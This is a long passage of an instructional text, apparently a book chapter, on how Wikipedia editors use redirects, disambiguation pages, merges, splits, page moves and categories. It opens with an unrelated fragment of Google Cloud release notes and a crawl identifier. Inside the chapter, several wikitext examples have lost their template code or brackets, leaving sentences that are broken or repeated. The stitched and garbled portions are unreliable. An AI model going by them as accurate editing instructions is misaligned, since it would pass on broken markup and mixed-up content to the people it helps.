manageable. Subcategories are useful on Wikipedia to subclassify when the schematic being followed is fairly natural to the subject matter and the relevance is evident. CategoryPoliticians with blue eyes]] is not helpful—why would anyone be looking for this information? But CategoryCanadian buskers]] is an acceptable subcategory of CategoryBuskers]] or of CategoryCanadian musicians]]. Subcategories should offer the general reader a convenient way to navigate a category and also provide information about the material included in a category. Following a general but not quite universal convention, articles should not appear in both a category and a subcategory. For instance, CategoryBeetles]] within CategoryInsects]] classifies some insects more precisely. According to the convention, the beetle articles should not also be in the more general CategoryInsects]]. Therefore, in searching CategoryInsects]] for all the Wikipedia articles on insects, you would also have to search CategoryBeetles]] and, within that, more than a dozen subcategories to find all of the beetle pages. Going through all the subcategories is the only comprehensive way to find all the articles related to a larger category, such as insects; if in this case you went to the page List of insects, you'd discover this list is a redirect to CategoryInsects]]. While finding all Wikipedia articles about insects is probably unreasonable (as the category is enormous), creating extremely detailed subcategories for smaller topics can make it difficult to see all the related articles at a glance. On the other hand, articles should always placed in the most detailed category that applies: An article about a beetle found in New Zealand should be placed in the Beetles of New Zealand category, not the higher-level category Beetles. Exploring a Category and Its Subcategories Wikipedia has a way to show an extended view of the whole structure of a complex category. The special page Special:CategoryTree will show you all of a category's subcategories arranged in a clickable tree structure. Go to the page and type the name of the category you want to examine in the box provided (JavaScript must be enabled in your browser). This tool makes it easy to see related articles in different subcategories. You can also include an expandable category tree on a wiki page by using the tag . No brackets are needed around the name of the category with this tag. 3.5. Categorization Projects You can find lots of information about projects to improve the use of categories at Wikipedia:WikiProject Categories/Current subprojects. You can also find an overview at CategoryWikipedia categorization]]. One long-standing categorization project that crosses all disciplines is Wikipedia:WikiProject Stub sorting. This project maintains the article categories for stubs, a list of which can be found at Wikipedia:WikiProject Stub sorting/List of stubs. These special categories are applied to articles not with standard category tags but with templates, which are discussed in the next chapter. Further Reading The categorization guideline Frequently asked questions about using categories The guideline about categorizing people The WikiProject dealing with categorization Current categorization projects The category of project pages dealing with categorization HousekeepingEdit Now that you've seen how the six tools can be used for hypertext editing, we will discuss a few problems that can arise when you try to apply the tools discussed in this chapter and solutions to those problems. 4.1. When a Page Move Is Blocked Suppose you want to move article P to title Q, but the MediaWiki software blocks the move. P and Q might be articles on identical topics; then you will need to merge the articles. If the other article Q is on a different topic than P but uses the same title that you wanted to use for P, then you need to create a disambiguation page for the main term and move the other articles to appropriate titles, which will then be linked to on the new disambiguation page. For instance, you might want to move Jolly Green Giant to Green Giant—but you'd find that Green Giant is already taken up with a page about the company. You could move the page Green Giant to Green Giant (company), and Jolly Green Giant to Green Giant (symbol). Then you could go back to the page Green Giant—it will be a redirect to Green Giant (company) from the move—and edit it to be a disambiguation page pointing to the two articles. Any other articles about green giants could also be listed. The page Jolly Green Giant will be automatically turned into a redirect to Green Giant (symbol), but you'll need to check for double redirects and add hatnotes to the two articles pointing back to the disambiguation page. This series of actions will help this small corner of Wikipedia make more sense to the reader. Sometimes the situation is more complicated. Page moves to temporary dummy titles can help. You can tag any unneeded redirects you create for speedy deletion when you're done. See Help:Moving a page for more guidance and Wikipedia:Requested moves to request administrator help with moving a page. 4.2. Default Meanings Sometimes an article about a lesser character, say from an anime or comic, will be created before the article about a more important figure with the same name. A disambiguation page should be created in this case. For the good of the encyclopedia, the lesser character shouldn't become the default meaning, however. For example Thor, the Norse god, must have priority over Thor (Marvel Comics). Problems of this type have to be sorted out by someone who understands blocked page moves. Moves are best made from a more general title to a more particular title: from John Jones to John James Jones, for example. That leaves the way open to making John Jones a disambiguation page. Moving uphill, or removing information from a title, is sometimes more problematic. Removing information can often make a title ambiguous, for example, moving George W. Bush to George Bush. If you remove information from a title, you risk deciding on the Wikipedia default meaning: You may be telling the world that John Jones should be read as John James Jones. In other words, make titles more informative and specialized to the topic. But don't add titles like Dr., honorifics, or post-nominal letters like initials after names; this is against Wikipedia conventions. Moving articles to more general titles should be used mainly for verbose titles, like moving List of Japanese Government and Private institutions and Groups (from 1930s to 1945) to List of Japanese institutions (1930–1945). 4.3. Avoiding Disambiguation Pages Wikilinks in articles should generally point to the exact article title meant, not a disambiguation page, since a link with a variety of possible meanings can be confusing to a reader unfamiliar with a topic. The process of changing wikilinks to point to precise articles instead of disambiguation pages is called avoid disambiguation pages. Generally, this work is done by checking What Links Here for disambiguation pages. Here's an example from the article Rectangle. The initial text in the article was A square is a special kind of rectangle where all four sides have equal length; But Square is a disambiguation page, which includes the meaning Square (slang) for an un-hip person. To avoid the dab page, change the link to Square to the following: A square is a special kind of rectangle where all four sides have equal length; The text now reads the same as before, but the destination of the wikilink is precise and correct. If an article using the precise meaning of a term hasn't been created yet, use a red-and-piped link rather than linking to the disambiguation page (which would be confusing). The redlink may also prompt someone to create the new article. Finding Disambiguation Work To find lists of disambiguation pages, including the disambiguation pages that need to be improved, try browsing through CategoryDisambiguation]]; the subcategories at the top sort disambiguation pages by topic. If you want to work on disambiguation pages that need cleanup help, consider joining the disambiguation WikiProject: Wikipedia:WikiProject Disambiguation. See Wikipedia:Disambiguation pages with links (shortcut WP:DPL) for a list of disambiguation pages that have incoming links (which should instead be links to more precise articles). 4.4. Controlling Category Sorting Pages within categories are displayed alphabetically by the first word of the page title, but this order can be modified by sort keys. CategoryPresidents of France]] may look quite ordinary (Figure 8.6, “CategoryPresidents of France]]”), but a few things are going on here. Under the letter G, you'll find the article for Charles de Gaulle. Under N, you'll find the article on Napoleon III of France, but under S (not N), you'll find the article on Nicolas Sarkozy. The case of Sarkozy obviously fits sorting by surname, but what else is happening here? Napoleon III was a president before he was an emperor, but his surname was, of course, Bonaparte. De Gaulle is a surname, but using the appropriate convention for French names, the de is not considered here. Figure 8.6. CategoryPresidents of France]] CategoryPresidents of France]] In a category, you would generally expect the article John Smith to be sorted under S for Smith rather than J for John. Wikipedia has two ways to achieve this result: magic words and sort keys. These two approaches have the same effect—making category listings treat the John Smith page article as if its title were Smith John—but magic words affect every category a page is in, while sort keys only work one category at a time. Each is highly flexible. The magic word for default sort is used like a template: For the page John Smith, it would be filled in like this: and placed in the wikitext above the list of categories. To classify Charles de Gaulle under G, the template would be filled in this way: Warning: Default sort key "Gaulle, Charles de" overrides earlier default sort key "Smith, John". The use of this template affects every category page that Charles de Gaulle might be placed in (potentially dozens); the article will always show up sorted under G. To only sort an article in a single category, or to vary sorting according to the category, use a sort key, which is added after a pipe character placed in the Category link in the article text: Category1900 births|Smith, John]] If you want to list Napoleon III under B for Bonaparte, for this particular category, enter CategoryPresidents of France|Bonaparte, Louis-Napoleon]] on the page Napoleon III of France; that will affect just how the article is sorted in the category Presidents of France. See Wikipedia:Categorization#Pipe tricks and sort keys for more examples and explanations. Although titles usually consist of plain text, they may begin with other symbols. The ordering used for category sorting when extended to non-alphanumeric characters is ASCII order, a standard used in byte codes for computing. Article titles beginning with numbers come before article titles starting with the letter A and article titles starting with symbols are always displayed before these, using a particular order for symbols. The article (Like) Linus, beginning with an opening parenthesis and about a demo by The Deftones, would precede the article about @Home Network, a defunct ISP, beginning with @, if these two articles were ever placed in the same (unlikely) category. The use of ASCII order explains one more thing about the Presidents of France category page. The listing starts with President of the French Republic, under an asterisk (*). This is because in the article President of the French Republic, the category tag reads CategoryPresidents of France|*] The asterisk is a device for bringing the article to the top of the listing so it is much more prominent. This method is commonly used for highlighting the main article in a category—the article that will give the reader an overview of the whole topic. A blank space after the pipe character is an extra refinement and has the same effect except no asterisk is included on the category page. 4.5. Categories and Templates for Redirects Certain links on a category page may appear in italics. This is because these are links for redirect pages. If you click the link, you go to the page to which the redirect leads (not to the article with the title you expected). The probable explanation is this: The redirect is anchored to a section of an article, and the category is right for that section but would be odd for the whole article. For example, the article might be about an author and the section about a film made from one of the author's books: Placing the author's name in a film category wouldn't be correct. Another example of how to use this device is illustrated by the French Presidents example. Charles Louis-Napoléon Bonaparte is a redirect to Napoleon III of France. The category tag CategoryPresidents of France|Bonaparte]] could be included in the redirect, so the category page would include the correct name for his time as president and be sorted under Bonaparte. Templates on redirects are mostly used to flag redirects that could usefully become articles in their own right. See CategoryRedirect templates]]. 4.6. Process-Style Resolutions Your problem may have a resolution, if you only knew where to go to get an answer. Category deletion Annoying and useless categories and categories that need to be renamed (often required to apply conventions consistently) are handled via a process. Go to Wikipedia:Categories for discussion (shortcut WP:CFD) to apply for deletion, merging, and renaming of categories or to participate in discussions about those issues. The process takes about a week. Problem redirects Go to Wikipedia:Redirects for discussion (shortcut WP:RFD). Disagreement about default meanings Editors are supposed to discuss difficulties about default meanings and come to a resolution. Failing that, Wikipedia:Requested moves (shortcut WP:RM) is the place to discuss any contested title change. Merges without consensus Most mergers should be simply tagged and discussed on their respective talk pages, but proposed merges can also be listed on Wikipedia:Proposed mergers for wider discussion. If there is no consensus, the merge should usually not occur. Contested title changes Go to Wikipedia:Requested moves (shortcut WP:RM) to discuss moves when consensus is not clear. This page is where matters concerning moves can be sorted out if there is real disagreement. Just add the request along with a short justification, and refer back to this page for a few days. Any editor may comment. Fixing cut-and-paste moves Go to Wikipedia:Cut and paste move repair holding pen (shortcut WP:SPLICE) if you need page histories fixed after copy-and-paste moves. Further Reading How to move over an existing page Sort order guideline templates The category for redirect templates Category discussion Redirect discussions Proposed mergers, sorted by month Where to request help with moves Guidelines for fixing cut and paste moves SummaryEdit Improving Wikipedia can go beyond editing text. The techniques discussed in this chapter complement the more glamorous business of writing articles. They allow you to present the site's content to the readers more clearly by creating navigational structures and sorting existing content. There are two special types of pages—redirect and disambiguation pages—that are used to help readers navigate Wikipedia. Redirects are a special type of page that take readers from one page title to another when more than one possible title for an article exists. Wikipedia has millions of redirects, all helping readers navigate and search the site. Disambiguation pages, on the other hand, pull together a list of articles with similar titles that could be confused. These pages can be created for any term with multiple meanings, as well as for common personal and family names that may refer to more than one person or family. Part of editing articles is ensuring that each article's scope is appropriate. If Wikipedia has two or more articles about the same topic or with very similar content, these articles may need to be merged. Any editor can merge two articles by editing them and combining their text on one of the pages and then redirecting the other article to the new combined article. If an article gets too long and unwieldy or deals with multiple disparate topics, the article may need to be split into two or more separate articles. Any editor can do this by creating a new page and copying some of the old article's content to the new page. Finally, an article may be created using the wrong title or a later decision is made to rename an article. In this case, that article needs to be moved to a new title. Finally, categorizing articles in appropriate categories is a fundamental part of sorting Wikipedia content, making it more accessible to readers and editors. Anyone can help with categorizing pages. Anyone can also create new categories, but understanding how the process works ensures your work is consistent with existing schemes. For all of these editing techniques, Wikipedia has developed many guidelines detailing how they are done and has created several community processes for dealing with problem cases.
https://en.m.wikibooks.org/wiki/How_Wikipedia_Works/Chapter_8
CC-MAIN-2014-15
refinedweb
10,616
50.36
Ai Ayumi wrote:public class Stubborn implements Runnable { static Thread t1; static int x = 5; public void run() { if(Thread.currentThread().getId() == t1.getId()) shove(); else push(); } static synchronized void push() { shove(); } static void shove() { synchronized(Stubborn.class) { System.out.print(x-- + " "); try { Thread.sleep(2000); } catch (Exception e) { ; } if(x > 0) push(); } } public static void main(String[] args) { t1 = new Thread(new Stubborn()); t1.start(); new Thread(new Stubborn()).start(); } } From K&B Practice Exam 2, q16: Answer: there is only one lock, so no deadlock can occur. Ai Ayumi wrote: Aren't synchronize(Stubborn.class) and static synchronized void push() locked seperately? Ai Ayumi wrote: If only one lock, Does that mean if t1 is using synchronize(Stubborn.class), t2 won't be able to access static synchronized void push()? Ai Ayumi wrote: Also, the output prints 5 4 3 2 1 (by t1), then 0 (by t2). Why is it not alternatingly by t1, t2? Henry Wong wrote: Ai Ayumi wrote: Aren't synchronize(Stubborn.class) and static synchronized void push() locked seperately? Synchronized static methods use the instance of Class class (that represents the class which the method is declared) as its lock. So, a thread that calls a synchronized static method of the Stubborn class, and a thread that locks on the Stubborn.class instance, are locking on the same object. Henry
http://www.coderanch.com/t/587034/java-programmer-SCJP/certification/won-Deadlock-Exam
CC-MAIN-2015-35
refinedweb
227
68.16
Michael Foord wrote: > Fred Mailhot wrote: >> Hi, >> >> It is stated in PEP 257 that: >> >> "The docstring of a script (a stand-alone program) should be usable as >> its "usage" message, printed when the script is invoked with incorrect >> or missing arguments (or perhaps with a "-h" option, for "help").[...]" > > I wasn't aware of that advice. Hmmm... > > Anway - how about this: > > import sys > module = sys.modules['__main__'] # or [__name__] > docstring = module.__doc__ No need for the fancy footwork - remember that a module's globals and its attributes are the same dict: ~/devel$ cat > demo.py "My docstring" print __doc__ ~/devel$ python demo.py My docstring For modules and classes, the interpreter sets "__doc__" in the current namespace automatically when it builds the docstring (not functions though - their docstring isn't added to the local scope). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia ---------------------------------------------------------------
http://mail.python.org/pipermail/doc-sig/2009-July/003796.html
CC-MAIN-2013-20
refinedweb
145
64.71
Text) # once iMessage opens, do a Paste into the message body webbrowser.open('sms:' + tel) Nice. Here's some UI-goodness wrapped around. (Caveat: Suffers from known bug that doesn't focus the alert input fields and I agree -- still not as nice as Editorial's builtin message-sender). import clipboard, webbrowser,console,sys msg = 'I am texting you through pythonista!' tel='' try: tel=console.input_alert('Text Sender','Enter Tel #/AppleID',tel) msg=console.input_alert('Text Sender','Enter Msg text',msg).strip() # if len(msg) > 128: # console.hud_alert('Warning: SMS messages may be truncated)','error',2.00) except Exception as e: sys.exit() clipboard.set(msg) # once iMessage opens, do a Paste into the message body webbrowser.open('sms:' + tel)
https://forum.omz-software.com/topic/1478/text-message-app-thanks-to-ccc
CC-MAIN-2017-34
refinedweb
120
55.5
Products and Services Downloads Store Support Education Partners About Oracle Technology Network There is a loophole in the type system that is present because we made getSuperclass() return a Class with an argument of a generic type. This comes about because of a cast() operation we recently added to class Class: 2384 /** 2385 * Casts an object to the class or interface represented 2386 * by this <tt>Class</tt> object. 2387 * 2388 * @param obj the object to be cast 2389 * @return the object after casting, or null if obj is null 2390 * 2391 * @throws ClassCastException if the object is not 2392 * null and is not assignable to the type T. 2393 * 2394 * @since 1.5 2395 */ 2396 public T cast(Object obj) { 2397 if (obj != null && !isInstance(obj)) 2398 throw new ClassCastException(); 2399 return (T) obj; 2400 } The loophole works like this: class A extends List<Integer> {} List<String> ls = new List<String>(); List<Integer> li = A.class.getSuperclass() // Class<List<Integer>> .cast(ls); li.add(1); String s = ls.get() // BANG! We can either remove the cast() operator (which would be a shame - it is really useful - see 4881275) or make the class type returned by A.class.getSuperclass be Class<List> instead of Class<List<Integer>>. ---------------- See Evaluation section for corrected type loophole snippet. ###@###.### 2004-04-02 CONVERTED DATA BugTraq+ Release Management Values COMMIT TO FIX: tiger-beta2 FIXED IN: tiger-beta2 INTEGRATED IN: tiger-b48 tiger-beta2 PUBLIC COMMENTS ... EVALUATION Actually, there is no compiler magic in getSuperclass() that would lead to a type loophole. If you try the example in the description you'll see why. However, there IS a problem due to the interaction of getClass() and cast(), and due to the interaction of class literals of generic types and cast(). We can fix these by requiring that all values of type Class<> generated by these techniques erase the argument type. A spec based on this scheme is awaiting CCC approval. ###@###.### 2004-02-27 Here's the real type loophole in action: List<String> ls = new ArrayList<String>(); List<Integer> li = new ArrayList<Integer>(); li = li.getClass().cast(ls); // no unchecked assignment warning li.add(1); String s = ls.get(0); // BANG! ###@###.### 2004-04-02 Parameterized class literals are already disallowed by the grammar. We should also disallow parameterized types from being used in instanceof expressions, since there's nothing that can be done with the type arguments at run time. ###@###.### 2004-04-02
http://bugs.java.com/view_bug.do?bug_id=4982096
CC-MAIN-2017-26
refinedweb
408
54.12
Introduction RGB LED modules can emit various colors of light. Three LEDs of red, green, and blue are packaged into a transparent or semitransparent plastic shell with four pins led out. The three primary colors of red, green, and blue can be mixed and compose all kinds of colors by brightness, so you can make an RGB LED emit colorful light by controlling the circuit. Components – 1 * Raspberry Pi – 1 * Breadboard – 1 * Network cable (or USB wireless network adapter) – 1 * RGB LED module – 1 * 4-Pin anti-reverse cable Experimental Principle In this experiment, we will use PWM technology to control the brightness of RGB.. We can see from the top oscillogram that the amplitude of DC voltage output is 5V. However, the actual voltage output is only 3.75V through PWM, for the high level only takes up 75% of the total voltage within a period. Here are the three basic parameters of PWM: 1. The term duty cycle describes the proportion of “on” time to the regular interval or “period” of time 2. Period describes the reciprocal of pulses in one second. 3. The voltage amplitude here is 0-5V. Input a value between 0 and 255 to the three pins of the RGB LED to make it display different colors. RGB LEDs can be categorized into common anode LED and common cathode LED. In this experiment, a common cathode RGB LED is used. The schematic diagram: Experimental Procedures Step 1: Build the circuit For C language users: Step 2: Change directory cd /home/pi/SunFounder_SensorKit_for_RPi2/C/02_rgb_led/ Step 3: Compile gcc rgb_led.c –lwiringPi Step 4: Run sudo ./a.out For Python users: Step 2: Change directory cd /home/pi/SunFounder_SensorKit_for_RPi2/Python/ Step 3: Run sudo python 02_rgb_led.py Now you can see the RGB LED light up, and flash different colors in turn. message to; } Python Code #!/usr/bin/env python import RPi.GPIO as GPIO import time colors = [0xFF0000, 0x00FF00, 0x0000FF, 0xFFFF00, 0xFF00FF, 0x00FFFF] R = 11 G = 12 B = 13 def setup(Rpin, Gpin, Bpin): global pins global p_R, p_G, p_B pins = {'pin_R': Rpin, 'pin_G': Gpin, 'pin_B': Bpin} GPIO.setmode(GPIO.BOARD) # Numbers GPIOs by physical location for i in pins: GPIO.setup(pins[i], GPIO.OUT) # Set pins' mode is output GPIO.output(pins[i], GPIO.HIGH) # Set pins to high(+3.3V) to off led p_R = GPIO.PWM(pins['pin_R'], 2000) # set Frequece to 2KHz p_G = GPIO.PWM(pins['pin_G'], 1999) p_B = GPIO.PWM(pins['pin_B'], 5000) p_R.start(100) # Initial duty Cycle = 0(leds off) p_G.start(100) p_B.start(100) def map(x, in_min, in_max, out_min, out_max): return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min def off(): for i in pins: GPIO.output(pins[i], GPIO.HIGH) # Turn off all leds def setColor(col): # For example : col = 0x112233 R_val = (col & 0xff0000) >> 16 G_val = (col & 0x00ff00) >> 8 B_val = (col & 0x0000ff) >> 0 R_val = map(R_val, 0, 255, 0, 100) G_val = map(G_val, 0, 255, 0, 100) B_val = map(B_val, 0, 255, 0, 100) p_R.ChangeDutyCycle(100-R_val) # Change duty cycle p_G.ChangeDutyCycle(100-G_val) p_B.ChangeDutyCycle(100-B_val) def loop(): while True: for col in colors: setColor(col) time.sleep(1) def destroy(): p_R.stop() p_G.stop() p_B.stop() off() GPIO.cleanup() if __name__ == "__main__": try: setup(R, G, B) loop() except KeyboardInterrupt: destroy()
https://learn.sunfounder.com/lesson-2-rgb-led-module-2/
CC-MAIN-2021-39
refinedweb
551
57.98
c Programming/stdio.h/setvbuf setvbuf is a function in standard C which lets the programmer control the buffering of a file stream. It is declared in <stdio.h>; its function prototype is: int setvbuf(FILE *stream, char *buf, int mode, size_t size); The stream argument is a pointer to the file stream for which the relevant buffering operations will be performed; buf is a character array of size in length, or a null pointer; and mode is the kind of buffering desired: _IOFBF, for fully buffered, _IOLBF for line buffered and _IONBF for unbuffered. These three macros are defined in <stdio.h>. setvbuf returns zero on success or nonzero on failure. If buf is a null pointer, the system will dynamically allocate a buffer of the specified size (size characters). If mode is _IONBF, the stream I/O will not be buffered, causing each subsequent I/O operation on the stream to be performed immediately, and the buf and size arguments are ignored. A related function, setbuf also controls the buffering of a file stream. Unlike setvbuf, setbuf takes only two arguments. The prototype is: void setbuf(FILE *stream, char *buf); setbuf's behavior is equivalent to: (void)setvbuf(stream, buf, buf ? _IOFBF : _IONBF, BUFSIZ); That is, if buf is not NULL, set the stream to fully buffered using the given buffer; otherwise, set the stream to unbuffered. If a buffer is provided to setbuf, it must be at least BUFSIZ bytes long. The function always succeeds. The code below is very unstable and might not work properly on specific compilers. It may even buffer overflow.. C99 says that setvbuf may not be called after writing to the stream, so this code invokes undefined behavior. C99 footnote 230 (non-normative) says the stream should be closed before buf is deallocated at the end of main. Example[edit] The output of this program should be Hello world followed by a newline. #include <stdio.h> #include <stdlib.h> int main(void) { char buf[42]; if(setvbuf(stdout, buf, _IOFBF, sizeof buf)) { perror("failed to change the buffer of stdout"); return EXIT_FAILURE; } printf("He"); /* The buffer contains "He"; nothing is written yet to stdout */ fflush(stdout); /* "He" is actually written to stdout */ if(setvbuf(stdout, NULL, _IONBF, 0)) { perror("failed to change the buffer of stdout"); return EXIT_FAILURE; } printf("llo w"); /* "llo w" is written to stdout, there is no buffering */ if(setvbuf(stdout, buf, _IOLBF, sizeof buf)) { perror("failed to change the buffer of stdout"); return EXIT_FAILURE; } printf("orld"); /* The buffer now contains "orld"; nothing is written yet to stdout */ putchar('\n'); /* stdout is line buffered; everything in the buffer is now written to stdout along with the newline */ return EXIT_SUCCESS; }
https://en.wikibooks.org/wiki/C_Programming/C_Reference/stdio.h/setvbuf
CC-MAIN-2017-30
refinedweb
450
58.72
The QMaemo5ListPickSelector widget displays a list of items. More... #include <QMaemo5ListPickSelector> Inherits QMaemo5AbstractPickSelector. This class was introduced in Qt 4.6. The QMaemo5ListPickSelector widget displays a list of items. The QMaemo5ListPickSelector is a selector that displays the contents of a QAbstractItemModel and allows the user to select one item from it. This object should be used together with the QMaemo5ValueButton. See also QAbstractItemModel and QMaemo5ValueButton. This property holds the index of the current item in the list picker. The current index can change when setting a new model with a lower row count than the previous one. By default, for an empty list picker or a list picker in which no current item is set, this property has a value of -1. Access functions: This property holds the model used in the list picker. By default, Maemo lists have centered text so it makes sense to call setTextAlignment(Qt::AlignCenter) on all items in the model in order to comply with the Maemo 5 style guides. Either list or table models can be used. Table models may require the modelColumn property to be set to a non-default value, depending on their contents. The use of tree models with a pick selector is untested. In addition, changing the model while the list dialog is displayed may lead to undefined behavior. Note: The list pick selector will not take ownership of the model. Access functions: This property holds the column in the model that is used for the picker results. This property determines the column in a table model used for determining the picker result. By default, this property has a value of 0. Access functions: Constructs a new list pick selector with the given parent object. Destroys the pick selector and the view (if set). It will not destroy the model. Reimplemented from QMaemo5AbstractPickSelector::currentValueText(). Sets the view to be used in the list pick selector pop-up to the given itemView. The list picker takes ownership of the view. Note: If you want to use the convenience views (like QListWidget, QTableWidget or QTreeWidget), make sure you call setModel() on the list picker with the convenience widget's model before calling this function. Returns the list view used for the list pick selector pop-up. Reimplemented from QMaemo5AbstractPickSelector::widget().
https://doc.qt.io/archives/qt-4.7/qmaemo5listpickselector.html
CC-MAIN-2021-17
refinedweb
379
58.48
. java.lang, java.utiletc. Creating a package in java is quite easy. Simply include a package command followed by name of the package as the first statement in java source file. package mypack; public class employee { ...statement; }The above statement create a package called mypack. Java uses file system directory to store package. For example the .class for any classes you to define to be part of mypack package must be stored in a directory called mypack package mypack class Book { String bookname; String author; Book(String b, String c) { this.bookname = b; this.author = c; } public void show() { System.out.println(bookname+" "+ author); } } class test { public static void main(String[] args) { Book bk = new Book("java","Herbert"); bk.show(); } } NOTE : Development directory is the directory where your JDK is install. Package is a way to organize files in java, it is used when a project consists of multiple modules. It also helps resolve naming conflicts. Package's access level also allows you to protect data from being used by the non-authorized classes. import keyword is used to import built-in and user-defined packages into your java source file. So that your class can refer to a class that is in another package by directly using its name. There are 3 different ways to refer to class that is present in different package Example : class MyDate extends java.util.Date { //statement; } Example : import java.util.Date; class MyDate extends Date { //statement. } Example : import java.util.*; class MyDate extends Date { //statement; } Example : package mypack; import java.util.*; But if you are not creating any package then import statement will be the first statement of your java source file.)); } } Output : 12 import static java.lang.Math.*; public class Test { public static void main(String[] args) { System.out.println(sqrt(144)); } } Output : 12
http://www.studytonight.com/java/package-in-java.php
CC-MAIN-2017-09
refinedweb
302
60.41
UFDC Home | Search all Groups | UF Institutional Repository | The king's coffer Permanent Link: Material Information Title: The king's coffer proprietors of the Spanish Florida treasury, 1565-1702 Physical Description: ix, 198 p. : map ; 24 cm. Language: Creator: Bushnell, Amy Turner Publisher: University Presses of Florida Place of Publication: Gainesville Subjects Subjects / Keywords: Finance, Public -- History -- Spain ( lcsh ) Finance, Public -- History -- Florida ( lcsh ) Finanzas públicas -- Historia -- Florida, EE.UU Genre: bibliography ( marcgt ) non-fiction ( marcgt ) Notes Bibliography: Bibliography: p. 187-191. Statement of Responsibility: Amy Bushnell. General Note: "A University of Florida book." General Note: Includes index. Record Information Source Institution: University of Florida Rights Management: All applicable rights reserved by the source institution and holding location. Resource Identifier: oclc - 07554319 lccn - 81007403 isbn - 0813006902 ocm07554319 Classification: lcc - HJ1242 .T87 1981 ddc - 354.460072/09 ssgn - 7,34 System ID: AA00014878:00001 This item is only available as the following downloads: ( XML ) Full Text The King's Coffer 1566-87 (Paris Is.) Guale (St. Catherines Is.) Augustine 1565 Matanzas Inlet GULF OF MEXICO ...---...... Spanish roads AF* miles Lo 0 50 100 150 SPANISH FLORIDA Composite of Tribal Territories and Place Names before 1702 (after Boyd, Chatelain, and Boniface) The King's Coffer Proprietors of the Spanish Florida Treasury 1565-1702 Amy Bushnell A University of Florida Book UNIVERSITY PRESSES OF FLORIDA Gainesville 1981 HJT /2'2. (acksonville), University of South Florida (Tampa), University of West Florida (Pensacola). Library of Congress Cataloging in Publication Data Bushnell, Amy. The king's coffer. "A University of Florida book." Bibliography: p. Includes index. 1. Finance, Public-Spain-History. 2. Finance, Public-Florida-History. I. Title HJ1242.B87 354.460072'09 81-7403 ISBN 0-8130-0690-2 AACR2 Copyright 1981 by the Board of Regents of the State of Florida Typography by American Graphics Corporation Fort Lauderdale, Florida Printed in USA Contents Preface Q: vii 1. The Florida Provinces and Their Treasury Go 1 2. The Expenses of Position _Q0 15 3. Proprietary Office Q 30 4. Duties and Organization -Q 50 5. The Situado _Q 63 6. The Royal Revenues 2Q~ 75 7. Political Functions of the Royal Officials _Q 101 8. Accounting and Accountability 2~0 118 Conclusion Q 137 Appendixes 2 141 Glossary Q 149 Notes GF 151 Bibliography (z 187 Index 192 V To Catherine Turner and Clyde Bushnell Preface ] HE historiography of Spanish Florida has traditionally concen- L treated on Indians, friars, and soldiers, all dependent on the yearly situado, or crown subsidy. Other Floridians, poor and com- mon, appear to have had no purpose beyond witless opposition to the royal governor This was so unusual for a Spanish colony that I was sure the true situation must have been more complex. In the imperial bureaucracy, ecclesiastical, military, magisterial, fiscal, and judicial functions of government were customarily distributed among a number of officials and tribunals with conflicting jurisdictions.I believe tatresearch would reveal an elite in Florida, encouraged by the crown as a counterweightito t-e governor and that this eitwas pursuingits own rational economic interests. I began by studying a branch of the Menendez clan, the Menendez Marquez family, correlating their ranching activities to the determi- nants of economic expansion in Florida. Governors came and went, but the Menendez Marquezes exercised power in the colony and held office in the treasury from 1565 to 1743. It became apparent that the way to identify and study a Florida elite was prosopographically, through the proprietors of the royal treasury. Such an investigation would serve a second purpose of wider interest and value: revealing how a part of the Spanish imperial bureaucracy operated on the local level. On the small scale of Florida, imperial organization and crown policies would leave the realm of the theoretical to become the problems of real people. vii I do not present the results of my research as a quantitative economic or financial history. The audited accounts necessary to that type of history exist; those for the sixteenth century have been examined with profit by Paul Hoffman and Eugene Lyon, and schol- ars may eventually mine the exhaustive legajos for the seventeenth century. But my purpose has been different: to describe the adminis- trators of one colonial treasury in action within their environment. To keep the project manageable I have limited it chronologically to the Habsburg era, from the time St. Augustine was founded in 1565 to the change of ruling houses, which the city observed in 1702. My main source has been the preserved correspondence between the crown and its governors and treasury officials, whose overlapping responsibilities led to constant wrangling and countless reports, legal actions, and letters. In a sense, every scholarly work is a collaboration between the researcher and his predecessors, yet one feels a special obligation to those who have given their assistance personally, offering insights, transcripts, and bibliographies with a generosity of mind that sees no knowledge as a private enclave. The foremost person on my list is L. N. McAlister; the director of my doctoral program. In the course of our long friendship, his standards of scholarship, writing, and teaching have become the models for my own. He and Michael V Gannon, David L. Niddrie, Marvin L. Entner; Claude C. Sturgill, Cornelis Ch. Goslinga, Eugene Lyon, and Peter Lisca, reading and criticizing the manuscript for this book in various of its drafts, have delivered me from many a blunder. For the new ones I may have fallen into, they are not accountable. Luis R. Arana, of the National Park Service at the Castillo de San Marcos, supplied me with interesting data on the Menendez Marquez family. Overton Ganong, at the Historic Saint Augustine Preserva- tion Board, permitted me to spend a week with the Saint Augustine Historical Society's unfinished transcript of the Cathedral Records of St. Augustine Parish. Ross Morrell of the Division of Archives, History, and Records Management of the Florida Department of State allowed me to see translations and summaries made under the division's auspices. Mark E. Fretwell, editor of the journal of the St. Augustine Historical Society, granted permission to reprint Chapter 2, which appeared as "The Expenses of Hidalguia in Seventeenth- Century St. Augustine," El Escribano 15 (1978):23-36. Paul E. Preface viii Hoffman, JohnJ. TePaske, Charles Arnade, and Samuel Proctor gave me encouragement and advice. Elizabeth Alexander and her staff at the P. K. Yonge Library of Florida History, University of Florida, provided a research home. The care they take of that library's rich resources is something I never cease to appreciate. For financial support I am indebted to the University of Florida, in particular to the Latin American Center the Graduate School, and the Division of Sponsored Research. The United States government supplied three years of NDEA Title VI fellowships in Spanish and Portuguese, and the American Association of University Women awarded me the Meta Glass and Margaret Maltby fellowship. My greatest acknowledgment is to the people I live with. My writer and scholar husband, Peter, has freed my time for writing without telling me how to do it. He, Catherine, and Colleen, listen- ing with good grace to a hundred historical anecdotes, have helped me to believe that what I was doing mattered. Amy Bushnell Cluj-Napoca, Romania July 6, 1980 Preface ix 1 The Florida Provinces and Their Treasury SHE Spanish Habsburgs liked their treasure tangible, in bars of L gold, heavy silver coins, precious stones, chunks of jewel amber and strings of pearls. By their command, each regional branch of the royal treasury of the Indies (hacienda real de Indias), a part of their patrimony, had a heavily guarded room containing a coffer of solid wood, reinforced at the edges, bottom, and corners with iron, strongly barred, and bearing three or four locks the keys to which were held by different persons. The keepers of the keys, who had to meet to open the coffer, were the king's personal servants, with antecedents in the customs houses of Aragon and the conquests of Castile. They were called the royal officials of the treasury. In the Indies, individual treasuries grew out of the fiscal ar- rangements for expeditions of conquest. The crown, as intent on collecting its legitimate revenues as on the propagation of the faith, required every conquistador to take along officers of the exchequer. A factor 